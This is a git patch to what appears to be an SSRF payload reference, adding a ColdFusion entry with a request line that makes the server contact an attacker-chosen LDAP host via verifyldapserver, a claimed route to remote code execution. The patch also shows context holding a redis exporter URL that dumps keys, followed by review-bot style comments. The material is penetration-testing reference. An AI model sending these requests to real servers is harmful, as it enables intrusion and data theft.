From a2d4467d7d3c287699c9c4568d94eb85426efa94 Mon Sep 17 00:00:00 2001 From: Elweth <39616215+elweth-sec@users.noreply.github.com> Date: Wed, 6 Nov 2024 15:45:22 +0100 Subject: [PATCH] Update README.md --- README.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/README.md b/README.md index 7193395..9b08bd4 100644 --- a/README.md +++ b/README.md @@ -93,6 +93,8 @@ The response times are slower or faster depending on whether or not the URL you - [W3 Total Cache](#w3) - [Docker](#docker) - [Gitlab Prometheus Redis Exporter](#redisexporter) +- [Coldfusion](#coldfusion) + **Possible via Gopher** @@ -616,6 +618,21 @@ The following endpoint will allow an attacker to dump all the keys in the redis http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=* ``` +
+ +## Coldfusion + +**Commonly bound ports: 80,443,8500** + +Some versions of Coldfusion allow you to connect arbitrarily to an LDAP server using a URL passed as a GET parameter. +- [https://www.exploit-db.com/exploits/50781](https://www.exploit-db.com/exploits/50781) + +This can lead to Remote Code Execution through LDAP Deserialization. + +``` +/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=SSRF_CANARY&vport=389&vstart=&vusername=&vpassword=&returnformat=json +``` + ---------- **Possible via Gopher**
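Review bot: In the list hunk (`@@ -93,6 +93,8 @@`), the new entry spells the product `Coldfusion`, while Adobe's name for it is ColdFusion. The link text should read `- [ColdFusion](#coldfusion)`; the lowercase anchor can stay as it is. The bare `+` line added after the entry looks redundant if the existing blank line before `**Possible via Gopher**` is kept, so one of the two can be dropped.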
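Review bot: In the new `## Coldfusion` section (`@@ -616,6 +618,21 @@`), "Some versions of Coldfusion" does not tell the reader which releases are affected, and "This can lead to Remote Code Execution through LDAP Deserialization" is stated without its preconditions or a source. Suggest naming the affected versions and the advisory identifier from the linked exploit-db entry, and stating whether the `verifyldapserver` method in `/CFIDE/wizards/common/utils.cfc` is reachable without authentication, so a reader can tell whether a given deployment is in scope. The example fixes `vport=389` and puts `SSRF_CANARY` only in `vserver`; a short sentence saying which parameters control the outbound connection would make the request line self-explanatory. The heading and prose should use the product's spelling, ColdFusion.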